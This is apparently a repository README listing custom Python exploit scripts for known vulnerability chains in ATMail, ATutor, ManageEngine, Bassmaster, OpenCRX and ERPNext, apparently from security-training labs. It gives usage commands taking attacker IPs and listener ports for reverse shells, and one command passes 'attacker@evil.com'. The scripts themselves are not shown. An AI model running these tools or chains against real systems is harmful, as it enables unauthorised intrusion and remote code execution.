
A collection of custom built scripts to exploit known vulnerability chains

Primary LanguagePython

Custom Exploits

A collection of scripts designed to exploit known vulnerability chains


ATMail 6.4 Session Riding

Exploit Chain: XSS + CSRF (Session Riding) -> Insecure File Upload -> RCE (Emails Deleted)

sudo python3 atmail-xxs_file-upload_rce.py -t [ATMAIL_SERVER_IP] -a [ATTACKER_IP] -u [ATMAIL_URL] -d [ADMIN_EMAIL] -f [ATTACKER_EMAIL]

sudo python3 atmail-xss_malicious_plugin_rce.py -t -a -u http://atmail -d admin@target.com -f attacker@evil.com

Exploit Chain: XSS + CSRF (Session Riding) -> Upload Malicious Plugin -> RCE

sudo python3 atmail_file-upload_rce.py -t [ATMAIL_SERVER_IP] -a [ATTACKER_IP] -u [ATMAIL_URL] -d [ADMIN_EMAIL] -f [ATTACKER_EMAIL]

sudo python3 atmail_file-upload_rce.py -t -a -u http://atmail -d admin@target.com -f attacker@evil.com

ATutor 2.2.1

Exploit Chain: Blind SQLi -> Auth Bypass -> Insecure File Upload -> RCE

python3 atutor_2.2.1-rce.py [ATUTOR_URL]

python3 atutor_2.2.1-rce.py http://atutor-server.com

Exploit Chain: PHP Type Juggling -> Auth Bypass (confirm.php)

Targeting Confirm.php Endpoint

python atutor_magic-hash-confirm.py [EMAIL-DOMAIN] [VICTIM_ID] [PAYLOAD_LENGTH] [ATUTOR_URL]

python atutor_magic-hash-confirm.py offsec.local 3 4 http://atutor-server.com

Targeting Password_reminder.php Endpoint

python3 atutor_magic-hash-password_reminder.py [VICTIM_ID] [ATUTOR_URL]

python3 atutor_magic-hash-password_reminder.py 1 http://atutor-server.com

ManageEngine Applications Manager

Exploit Chain: Blind Time-Based SQLi -> COPY TO payload -> RCE

Targeting wmiget.vbs script through AMUserResourcesSyncServlet

python3 manage-engine_sqli_to_rce_vbs.py [TARGET] [LHOST] [LPORT]

python3 manage-engine_sqli_to_rce_vbs.py http://target-server.com 4444

Exploit Chain: Blind SQLi -> Large Object Poisoning -> Malicious UDF -> RCE

Uploading custom DLL through AMUserResourcesSyncServlet

python3 manage-engine_sqli_to_rce_large-object.py [MANAGEENGINE_DOMAIN] [LHOST] [LPORT]

python3 manage-engine_sqli_to_rce_large-object.py manageengine:8443 4444

Bassmaster (Batch Proccessing API for HTTP API (hapi) Library)

Exploit Chain: Code Injection -> RCE

python3 bassmaster_code-injection_to_rce.py [TARGET_URL] [LHOST] [LPORT]

python3 bassmaster_code-injection_to_rce.py http://bassmaster-api-server.com:8000 4444

Exploit Chain: Code Injection -> Safe-Eval 0.3.0 Bypass -> RCE

python3 bassmaster_safe-eval-bypass_rce.py [TARGET_URL] [LHOST] [LPORT]

python3 bassmaster_safe-eval-process_rce.py http://bassmaster-api-server.com:8000 4444

OpenCRX 4.2.0 Auth Bypass through Password Reset Function (Alerts Removed)

Exploit Chain: Insecure Password Reset Token Generation (java.util.Random)

python3 opencrx-auth_bypass.py -f [TARGET_URL] -u [TARGET_USERNAME] -p [NEW_PASSWORD]

python3 opencrx-auth_bypass.py -f http://opencrx.com -u admin-Standard -p p@ssw0rd12

ERPNext (Frappe / Jinja2)

Exploit Chain: SQLi -> SSTI -> RCE

python3 erpnext_auth-bypass_to_rce.py -u [TARGET_URL] -l [LHOST] -p [LPORT]

python3 erpnext_auth-bypass_to_rce.py -u http://erpnextCOM -l -p 4444